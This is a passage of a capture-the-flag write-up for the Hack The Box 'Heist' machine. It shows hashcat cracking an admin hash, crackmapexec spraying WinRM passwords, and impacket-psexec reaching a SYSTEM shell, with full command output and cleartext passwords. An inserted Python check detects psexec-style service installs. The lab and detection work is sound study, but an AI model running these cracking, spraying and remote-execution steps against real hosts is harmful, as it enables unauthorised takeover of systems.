admin user


I got the password hash for the admin user earlier. It was a tricky case where I didn't have access to a directory but did to a file that was in it: c:\inetpub\wwwroot\login.php

Hashcat was unable to crack the hash. I will run the admin user's password against it to validate the password.

┌──(kali㉿kali)-[~/archive/htb/labs/heist]
└─$ hashcat -a 0 -m 1400 hashes/admin@support.htb.hash passwd
hashcat (v6.2.6) starting
 
hashes: 1 digests; 1 unique digests, 1 unique salts
bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
rules: 1
 
dictionary cache built:
* filename..: passwd
* passwords.: 4
* bytes.....: 62
* keyspace..: 4
* runtime...: 0 secs
 
Approaching final keyspace - workload adjusted.           
 
91c077fb5bcdd1eacf7268c945bc1d1ce2faf9634cba615337adbf0af4db9040:4dD!5}x/re8]FBuZ
                                                          
session..........: hashcat
status...........: Cracked
hash.mode........: 1400 (SHA2-256)
hash.target......: 91c077fb5bcdd1eacf7268c945bc1d1ce2faf9634cba615337a...db9040
time.started.....: Wed Jan 11 13:32:34 2023 (0 secs)
time.estimated...: Wed Jan 11 13:32:34 2023 (0 secs)
kernel.feature...: Pure Kernel
guess.base.......: File (passwd)
guess.queue......: 1/1 (100.00%)
speed.#1.........:       88 H/s (0.01ms) @ Accel:256 Loops:1 Thr:1 Vec:8
recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
progress.........: 4/4 (100.00%)
rejected.........: 0/4 (0.00%)
restore.point....: 0/4 (0.00%)
restore.sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
candidate.engine.: Device Generator
candidates.#1....: stealth1agent -> 4dD!5}x/re8]FBuZ
hardware.mon.#1..: Util: 36%
 
started: Wed Jan 11 13:32:08 2023
stopped: Wed Jan 11 13:32:36 2023
 

They matched. This means the credential is valid for the web app.

Logged in as admin@support.htb, but there was nothing there.

┌──(kali㉿kali)-[~/archive/htb/labs/heist]
└─$ crackmapexec winrm $IP -u users -p passwd
smb         10.10.10.149    5985   none             [*] none (name:10.10.10.149) (domain:None)
http        10.10.10.149    5985   none             [*] http://10.10.10.149:5985/wsman
winrm       10.10.10.149    5985   none             [-] none\administrator:stealth1agent
winrm       10.10.10.149    5985   none             [-] none\administrator:$uperP@ssword
winrm       10.10.10.149    5985   none             [-] none\administrator:Q4)sJu\Y8qz*A3?d
winrm       10.10.10.149    5985   none             [+] none\administrator:4dD!5}x/re8]FBuZ (Pwn3d!)

The admin user turned out to be the Administrator user.

impacket-psexec


┌──(kali㉿kali)-[~/archive/htb/labs/heist]
└─$ impacket-psexec 'administrator@$IP' -target-ip $IP
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
 
Password:
[*] Requesting shares on 10.10.10.149.....
[*] Found writable share ADMIN$
[*] Uploading file zzudbplJ.exe
[*] Opening SVCManager on 10.10.10.149.....
[*] Creating service gVFc on 10.10.10.149.....
[*] Starting service gVFc.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.437]
(c) 2018 Microsoft Corporation. All rights reserved.
 
C:\Windows\system32> whoami
nt authority\system
 
C:\Windows\system32> hostname
SupportDesk
 
C:\Windows\system32> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::43
   IPv6 Address. . . . . . . . . . . : dead:beef::80d2:db11:1674:be5e
   Link-local IPv6 Address . . . . . : fe80::80d2:db11:1674:be5e%15
   IPv4 Address. . . . . . . . . . . : 10.10.10.149
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%15
                                       10.10.10.2
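The psexec session above leaves a very recognisable trail on the target: a writable ADMIN$ share, a random-named executable uploaded into it, and a short random-named service created and started from that binary. The following detection check over service-install records is an added example written for this writeup, not part of the original post or of Impacket; the event 7045 field names and the sample records are constructed assumptions, with the last record mirroring the gVFc / zzudbplJ.exe artefacts shown above.

```python
import re

# Constructed sample records modelled on Windows System log event 7045
# ("A service was installed in the system"); field names are an assumption.
# ADMIN$ maps to %SystemRoot%, so a psexec-style upload lands in the Windows
# root rather than under System32.
SAMPLE_7045 = [
    {"ServiceName": "Spooler",
     "ImagePath": r"C:\Windows\System32\spoolsv.exe",
     "AccountName": "LocalSystem", "StartType": "auto start"},
    {"ServiceName": "MozillaMaintenance",
     "ImagePath": r'"C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"',
     "AccountName": "LocalSystem", "StartType": "demand start"},
    {"ServiceName": "gVFc",
     "ImagePath": r"%SystemRoot%\zzudbplJ.exe",
     "AccountName": "LocalSystem", "StartType": "demand start"},
]

# Letters-only .exe dropped directly into the Windows directory (ADMIN$ root).
ADMIN_SHARE_EXE = re.compile(
    r'^"?(?:%SystemRoot%|%windir%|[A-Za-z]:\\Windows)\\([A-Za-z]{6,12})\.exe"?$',
    re.IGNORECASE)
# Short, letters-only service name, like the random ones psexec generates.
RANDOM_SVC_NAME = re.compile(r"^[A-Za-z]{4,8}$")


def looks_random(name: str) -> bool:
    """Crude randomness test: mixed case and few vowels (gVFc, zzudbplJ)."""
    vowels = sum(ch in "aeiouAEIOU" for ch in name)
    mixed = name != name.lower() and name != name.upper()
    return mixed and vowels <= len(name) // 3


def psexec_like(record: dict) -> list:
    """Return the signals that make one 7045 record resemble a psexec install."""
    reasons = []
    name = record.get("ServiceName", "")
    path = record.get("ImagePath", "")
    if RANDOM_SVC_NAME.match(name) and looks_random(name):
        reasons.append(f"random-looking service name {name!r}")
    match = ADMIN_SHARE_EXE.match(path)
    if match and looks_random(match.group(1)):
        reasons.append(f"random-looking binary in Windows root {path!r}")
    # Running as LocalSystem only corroborates; it is not a signal on its own.
    if reasons and record.get("AccountName", "").lower() == "localsystem":
        reasons.append("runs as LocalSystem")
    return reasons


def find_psexec_like(records) -> dict:
    """Map service names to reasons where at least two signals agree."""
    hits = {}
    for rec in records:
        reasons = psexec_like(rec)
        if len(reasons) >= 2:
            hits[rec["ServiceName"]] = reasons
    return hits
```

Deleting the service and binary afterwards does not remove the 7045 record, so this check works on historical logs as well as live ones.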

System Level Compromise

Beyond


c:\Users\Administrator\Documents> dir
 Volume in drive C has no label.
 Volume Serial Number is FA65-CD36
 
 directory of c:\Users\Administrator\Documents
 
04/22/2019  08:13 AM    <DIR>          .
04/22/2019  08:13 AM    <DIR>          ..
04/22/2019  08:24 AM               343 chase.ps1
               1 File(s)            343 bytes
               2 Dir(s)   3,458,072,576 bytes free
 
c:\Users\Administrator\Documents> type chase.ps1
$u = 'supportdesk\chase'
$p = convertto-securestring 'Q4)sJu\Y8qz*A3?d' -asplain -force
$c = new-object system.management.automation.pscredential($u, $p)
start-process 'c:\Program Files\Mozilla Firefox\firefox.exe' -Credential $c -ArgumentList 'localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login='

This must have been the script that was running in the background.